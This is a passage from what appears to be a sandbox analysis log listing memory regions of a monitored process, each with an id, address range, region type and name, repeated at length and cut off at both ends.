= "pagefile_0x0000000001e80000" filename = "" Region: id = 19734 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19735 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19736 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19737 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19738 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19739 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19740 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19741 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19742 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19743 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19744 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19745 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19746 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19747 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19748 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19749 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19750 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19751 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19752 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19753 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19754 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19755 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19756 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19757 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19758 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19759 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19760 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19761 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19762 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19763 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19764 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19765 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19766 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19767 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19768 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19769 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19770 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19771 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19772 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19773 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19774 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19775 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19776 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 19777 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 19778 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19779 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19780 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 19781 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 19782 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19783 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19784 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19785 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19786 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19787 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19788 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19789 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19790 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19791 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19792 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19793 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19794 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19795 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19796 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 19797 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 19798 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19799 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19800 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19801 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19802 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19803 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19804 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19805 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19806 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19807 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19808 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19809 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19810 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19811 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19812 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19813 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19814 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19815 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19816 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19817 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19818 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19819 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19820 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19821 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19822 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19823 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19824 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19825 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19826 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19827 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19828 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19829 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19830 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19831 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19832 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19833 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19834 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19835 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19836 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19837 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19838 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19839 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19840 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19841 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19842 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19843 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19844 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19845 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19846 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19847 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19848 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19849 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19850 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19851 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19852 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19853 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19854 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19855 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19856 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 19857 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 19858 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19859 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19860 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19861 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19862 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19863 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19864 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19865 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19866 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19867 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19868 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19869 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19870 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19871 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19872 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19873 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19874 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19875 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19876 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19877 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19878 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19879 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19880 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19881 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19882 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19883 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19884 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19885 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19886 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19887 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19888 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19889 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19890 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19891 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19892 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19893 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19894 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19895 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 19896 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 19897 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19898 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19899 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19900 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 19901 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 19902 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19903 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19904 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19905 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19906 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19907 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19908 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19909 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19910 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19911 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19912 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19913 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19914 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19915 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19916 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19917 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19918 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19919 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 19920 start_va = 0x3d50000 end_va = 